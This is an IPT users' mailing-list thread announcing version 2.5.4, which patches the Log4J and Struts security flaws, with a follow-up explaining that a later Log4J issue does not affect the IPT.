Dear IPT users,
Yesterday, the developers of the Log4J library used by the IPT issued a
further security update, described at [1]. It is less severe than the
first problem, since it does not allow attackers to run their own code
on a hacked server.
The IPT does not use this part of Log4J, so we will not release a new
version of the IPT for this.
It's still important to upgrade to version 2.5.4, containing Log4J
version 2.15.0, as described in the email below.
Best regards,
Matthew
[1]
https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
On 11/12/2021 10:55, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This
version contains fixes to critical security issues with the Struts and
Log4J[2] libraries.
According to the press [3], the problem with the Log4J library
vulnerability is being exploited by malicious users — and I can
already see queries containing "jndi" in the web server logs for the
IPTs GBIF hosts at cloud.gbif.org, although they are random attempts
and would not succeed.
All users are highly encouraged to upgrade to this version as soon as
possible.
As usual, upgrade and installation instructions are in the manual [1].
Please remember to check your data directory backup is working before
starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3]
https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
Best regards,
Matthew
_______________________________________________
IPT mailing list
[email protected]
https://lists.gbif.org/mailman/listinfo/ipt
_______________________________________________
IPT mailing list
[email protected]
https://lists.gbif.org/mailman/listinfo/ipt
